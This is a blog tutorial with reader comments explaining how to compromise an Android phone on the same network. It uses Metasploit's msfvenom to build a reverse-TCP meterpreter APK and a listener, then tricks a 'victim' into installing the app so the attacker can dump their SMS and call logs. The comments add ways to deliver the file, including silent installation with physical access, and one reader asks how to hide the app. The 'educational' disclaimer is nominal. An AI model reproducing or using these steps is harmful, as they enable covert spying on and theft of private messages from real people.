Hack Android Mobile with Metasploit [Same Network]

Disclaimer: This tutorial is only for educational purpose. We are not responsible for any misuse of this tutorial.

Scenario: Victim uses android smart phone. Attackers needs the call log and SMS of the victim.


1. Metasploit

2. Linux/Windows [For demonstration I am using Ubuntu 14.04]

3. Social Engineering


1. Open terminal and type “sudo msfconsole”  1111

2. After few seconds metasploit will be loaded.


3. Type “use exploit/multi/handler

4. Type “set PAYLOAD android/meterpreter/reverse_tcp

5. Type “set LHOST” [LHOST=Attacker’s ip over network]

6. Type “exploit


7. After typing exploit we just create a listener which is waiting for an incoming connection.

8. Now let’s make a malicious apk file with metasploit by typing following command:

sudo msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 > virus.apk


9. You can find virus.apk file in your home folder.

Screenshot from 2015-08-30 15:34:57

10. Send this virus.apk file to victim’s phone and convince him to install it. Whenever victim installs that and opens the file, a remote connection will be made from victim’s IP to attackers IP on port 4444. Our metasploit listener will catch this connection and open a meterpreter session.


11. Type “sysinfo” to check the remote android system information.


12. Type “dump_sms” to dump all SMS of victim.


13. Type “dump_calllog” to dump the call history.


Conclusion: This will work on same network. Follow us for our next tutorial where we will show you show to use this exploit on a different network.

5 comments on “Hack Android Mobile with Metasploit [Same Network]”

  1. Samuel Myung says:

    I have an problem. I don’t know how to transfer the apk file to an android. How do you do that?

    1. Hello Samuel,

      You can send the apk file using following procedure.
      1. Mail it by using Gmail, Yahoo etc.
      2. Upload the file to any file uploading site and then give the downloadable link to the victim.
      3. Keep that apk file to your cloud drive (one drive, google drive, mega.nz etc.) and if you have the physical access of victim’s android then you can download the apk and install it silently.

      This is for learning purpose. Hope you understand.

  2. r00tr0x says:

    but how can we make it a stealth one?
    ie i need to hide it from the application drawer one the first click

  3. Eva says:

    Thank you so much!

  4. Ryan Harish says:

    Henry is the solution to the game

Leave a Reply

Your email address will not be published. Required fields are marked *

Secured By miniOrange